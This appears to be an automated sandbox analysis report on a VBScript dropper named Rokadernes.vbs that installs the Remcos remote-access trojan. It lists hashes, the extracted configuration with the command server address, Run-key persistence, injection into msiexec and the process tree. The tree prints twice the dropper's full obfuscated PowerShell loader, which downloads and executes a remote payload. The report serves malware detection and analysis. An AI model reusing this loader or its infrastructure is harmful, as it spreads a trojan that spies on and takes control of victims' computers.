Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-12-2024 05:43
Static task
static1
Behavioral task
behavioral1
Sample
Rokadernes.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Rokadernes.vbs
Resource
win10v2004-20241007-en
General
-
Target
Rokadernes.vbs
-
Size
71KB
-
MD5
693321a98dce16a4369d750bac3c4fb0
-
SHA1
cadf2497394e79cfd3c02a4f5bbb1adb6503d29c
-
SHA256
d719392462e09d59474cafa8d7b107d4e3063a664a51e87c5e2b750cf100be69
-
SHA512
8e97a99d8c64243fb6a348703d5bde412e599064162fc44be9f07cc28c78fff28720cce03df253c8537dd370abbaad0748fa02f2b828a64b54c6504d4eeaf1c5
-
SSDEEP
1536:mYzMve/RmHTWUZnz7FcfIJVd00cYiEzYfOEt2b4:mYiepmzWqz5tJ300bz9Et2b4
Malware Config
Extracted
remcos
RemoteHost
87.120.120.51:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
true
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-6US4Y7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2456 powershell.exe 7 2656 msiexec.exe 9 2656 msiexec.exe -
Executes dropped EXE 1 IoCs
pid Process 924 remcos.exe -
Loads dropped DLL 1 IoCs
pid Process 2656 msiexec.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7 = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7 = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2656 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3000 powershell.exe 2656 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language remcos.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2456 powershell.exe 3000 powershell.exe 3000 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2992 wrote to memory of 2456 2992 WScript.exe 31 PID 2992 wrote to memory of 2456 2992 WScript.exe 31 PID 2992 wrote to memory of 2456 2992 WScript.exe 31 PID 3000 wrote to memory of 2656 3000 powershell.exe 36 PID 3000 wrote to memory of 2656 3000 powershell.exe 36 PID 3000 wrote to memory of 2656 3000 powershell.exe 36 PID 3000 wrote to memory of 2656 3000 powershell.exe 36 PID 3000 wrote to memory of 2656 3000 powershell.exe 36 PID 3000 wrote to memory of 2656 3000 powershell.exe 36 PID 3000 wrote to memory of 2656 3000 powershell.exe 36 PID 3000 wrote to memory of 2656 3000 powershell.exe 36 PID 2656 wrote to memory of 924 2656 msiexec.exe 38 PID 2656 wrote to memory of 924 2656 msiexec.exe 38 PID 2656 wrote to memory of 924 2656 msiexec.exe 38 PID 2656 wrote to memory of 924 2656 msiexec.exe 38 PID 2656 wrote to memory of 924 2656 msiexec.exe 38 PID 2656 wrote to memory of 924 2656 msiexec.exe 38 PID 2656 wrote to memory of 924 2656 msiexec.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rokadernes.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\ProgramData\Remcos\remcos.exe"C:\ProgramData\Remcos\remcos.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:924
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UD5ADKK5B5YWJU115CJP.temp
Filesize7KB
MD523a28a16a17ad4791a05a5dbabae09fe
SHA1f82d3cb5154d45f3423aa723d0b4e5b5f5ad6b59
SHA256acd6b4d7fafb78787594a3d9604bd81b98b2921708273827a0b7522efb84d18b
SHA5124ccb047621b490b19146d7dba8714da69da5044d4111eb4dd2bc0e7faad68a5efb3e33506799faccbe51c3eda88007e1197a314a8fb26e4031def48225a44a69
-
Filesize
431KB
MD5e03d2d397ed28d6b14bef58a8d4d458d
SHA17d4576f4e95fce89c46f8938e4878e4978451064
SHA2563431efe72e7264a06276d165454755c1a1f98b0f57132c43f8369db6b3c6324a
SHA512ff97033c57032e8f65334183d70c44f3d4b95151e27605aab48a68cd5dd53278ae43f8004f96d38f218c3a8d320ebf329c342199f8987691240f45855ad8ed34
-
Filesize
71KB
MD5eee470f2a771fc0b543bdeef74fceca0
SHA1bd9bbb448dec04b1aaa8ae530e9814fdbce0a3d5
SHA25678617ddf9a0067a32cb5d87a796c93a9618ac006ccdcb3c7c824fdeb6ec5fd59
SHA5129a89fef9c26e3dc98afdc61eea66e2b4a52843495b3433c21b5a55e744db42268e3d10587817b4c8adc7bfcc99065e0f3a7b6a7a05b1218ce7bba129d5a105e2